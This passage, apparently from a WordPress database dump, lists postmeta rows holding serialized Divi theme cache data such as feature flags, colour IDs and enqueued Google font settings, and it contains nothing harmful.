1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33045,1036,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33046,1036,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33047,1036,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33048,1036,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33049,1028,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33050,1028,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33051,1028,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33052,1028,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33053,1019,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33054,1011,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33055,1011,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33056,1011,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33057,1011,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33035,895,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33036,1072,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33037,1054,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33038,1054,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33031,1087,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33032,895,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33033,895,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33034,895,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33028,1087,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33029,1087,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33030,1087,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33026,1214,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33027,1214,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33022,1124,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33023,1124,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33024,1214,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33025,1214,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33016,1144,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33017,1144,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33018,1144,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33019,1144,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33020,1124,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33021,1124,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33012,1220,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33013,1220,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33014,1220,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33015,1220,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33007,1542,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33008,1244,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33009,1244,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33010,1244,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(33011,1244,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33003,945,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33004,1542,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33005,1542,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33006,1542,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32999,827,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:2:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(33000,945,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(33001,945,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(33002,945,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0:{}s:24:\"section_dividers_enabled\";a:0:{}s:12:\"link_enabled\";a:0:{}s:21:\"split_testing_enabled\";a:0:{}s:28:\"social_follow_icon_font_divi\";a:0:{}s:26:\"social_follow_icon_font_fa\";a:0:{}s:17:\"specialty_section\";a:0:{}s:23:\"sticky_position_enabled\";a:0:{}s:16:\"global_color_ids\";a:5:{i:0;s:18:\"gcid-primary-color\";i:1;s:20:\"gcid-secondary-color\";i:2;s:18:\"gcid-heading-color\";i:3;s:15:\"gcid-body-color\";i:4;s:15:\"gcid-link-color\";}s:23:\"css_grid_layout_enabled\";a:0:{}s:19:\"flex_layout_enabled\";a:0:{}s:20:\"block_layout_enabled\";a:0:{}s:15:\"block_mode_blog\";a:0:{}}'),(32995,2,'et_enqueued_post_fonts','a:3:{s:6:\"family\";a:3:{i:0;s:101:\"Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic\";i:1;s:137:\"Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic\";i:2;s:62:\"Playfair+Display+SC:regular,italic,700,700italic,900,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:9:\"cache_key\";s:71:\"{\"gph\":0,\"divi\":\"5.6.0\",\"wp\":\"7.1\",\"enable_all_character_sets\":\"false\"}\";}'),(32996,827,'_divi_dynamic_assets_cached_modules','a:2:{s:6:\"blocks\";a:0:{}s:10:\"shortcodes\";a:0:{}}'),(32997,827,'_divi_dynamic_assets_canvases_used','a:5:{s:17:\"canvas_portal_ids\";a:0:{}s:14:\"appended_above\";a:0:{}s:14:\"appended_below\";a:0:{}s:19:\"interaction_targets\";a:0:{}s:19:\"all_canvas_metadata\";a:0:{}}'),(32998,827,'_divi_dynamic_assets_cached_feature_used','a:22:{s:18:\"excerpt_content_on\";a:0:{}s:25:\"media_embedded_in_content\";a:1:{i:0;b:1;}s:15:\"animation_style\";a:0:{}s:20:\"interactions_enabled\";a:0:{}s:13:\"gutter_widths\";a:0:{}s:14:\"icon_font_divi\";a:0:{}s:12:\"icon_font_fa\";a:0:{}s:8:\"lightbox\";a:0:{}s:26:\"fullscreen_section_enabled\";a:0:{}s:22:\"scroll_effects_enabled\";a:0: